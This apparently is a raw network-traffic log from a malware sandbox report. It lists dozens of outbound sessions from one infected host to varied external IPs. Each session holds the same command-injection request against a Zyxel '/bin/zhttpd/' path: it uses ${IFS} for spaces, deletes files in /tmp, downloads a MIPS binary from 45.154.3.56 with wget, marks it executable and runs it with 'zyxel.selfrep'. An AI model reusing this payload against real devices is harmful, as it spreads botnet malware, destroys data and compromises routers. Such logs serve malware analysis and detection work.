                        Mar 12, 2024 08:50:36.158238888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2415192.168.2.1452214128.69.23.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158284903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2416192.168.2.143877025.140.214.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158329010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2417192.168.2.143995231.146.116.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158374071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2418192.168.2.1450040223.124.240.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158418894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2419192.168.2.1460644140.80.1.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158443928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2420192.168.2.144105634.116.234.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158509016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2421192.168.2.1440956105.93.47.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158569098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2422192.168.2.1434556181.221.229.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158596992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2423192.168.2.1448370223.75.47.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158613920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2424192.168.2.1451488116.165.124.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158659935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2425192.168.2.1456738175.213.113.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158704042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2426192.168.2.1459844167.253.37.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158755064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2427192.168.2.145779813.14.94.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158790112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2428192.168.2.1449980119.157.75.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158828974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2429192.168.2.145507438.176.80.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158855915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2430192.168.2.143722089.57.11.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158921003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2431192.168.2.1444036198.211.69.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158966064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2432192.168.2.1460792209.14.28.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159013033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2433192.168.2.144781060.18.233.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159049988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2434192.168.2.144868025.230.19.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159121037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2435192.168.2.1453404101.190.196.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159154892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2436192.168.2.14364082.41.97.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159193993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2437192.168.2.1442324154.231.150.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159250021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2438192.168.2.1459444223.149.119.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159301043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2439192.168.2.144599895.15.91.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159318924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2440192.168.2.1433532171.184.205.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159368038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2441192.168.2.1454484119.201.103.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159409046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2442192.168.2.1458806116.138.252.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159463882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2443192.168.2.1456814101.6.141.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159488916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2444192.168.2.143688277.151.157.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159548998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2445192.168.2.14347301.117.136.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159593105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2446192.168.2.1455136193.75.151.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159625053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2447192.168.2.14477165.151.21.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159662962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2448192.168.2.1438250131.207.153.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159712076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2449192.168.2.1457866146.181.224.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159734964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2450192.168.2.1432816181.248.149.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159813881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2451192.168.2.144244820.70.135.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159842968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2452192.168.2.1455516210.180.151.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159871101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2453192.168.2.1449978206.106.104.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159938097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2454192.168.2.1437830170.60.227.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.159985065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2455192.168.2.14518402.121.66.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160029888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2456192.168.2.145630878.78.22.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160065889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2457192.168.2.144348025.83.93.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160105944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2458192.168.2.1454188221.123.110.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160157919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2459192.168.2.1447862105.89.228.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160197020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2460192.168.2.144365099.48.229.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160259008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2461192.168.2.1448360172.93.182.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160295010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2462192.168.2.1436270118.108.247.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160329103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2463192.168.2.143764225.229.107.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160376072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2464192.168.2.1459732144.28.56.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160429955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2465192.168.2.1445582202.153.238.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160487890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2466192.168.2.146013431.39.51.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160521030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2467192.168.2.1460662165.31.130.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160556078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2468192.168.2.1453676113.226.74.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160614967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2469192.168.2.1443506136.97.75.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160659075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2470192.168.2.1438146220.70.122.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160684109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2471192.168.2.1453018179.150.87.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160748005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2472192.168.2.143348478.60.53.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160803080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2473192.168.2.1445678162.225.191.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160834074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2474192.168.2.1457490191.224.117.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160885096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2475192.168.2.144889023.220.142.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160931110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2476192.168.2.1459964171.132.190.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.160960913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2477192.168.2.1457620155.191.66.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161020994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2478192.168.2.14464084.205.114.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161067963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2479192.168.2.1435072206.119.247.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161102057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2480192.168.2.1456880189.42.72.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161164045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2481192.168.2.1460544196.22.40.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161200047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2482192.168.2.1441144147.83.19.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161252022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2483192.168.2.143882841.110.192.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.161288977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
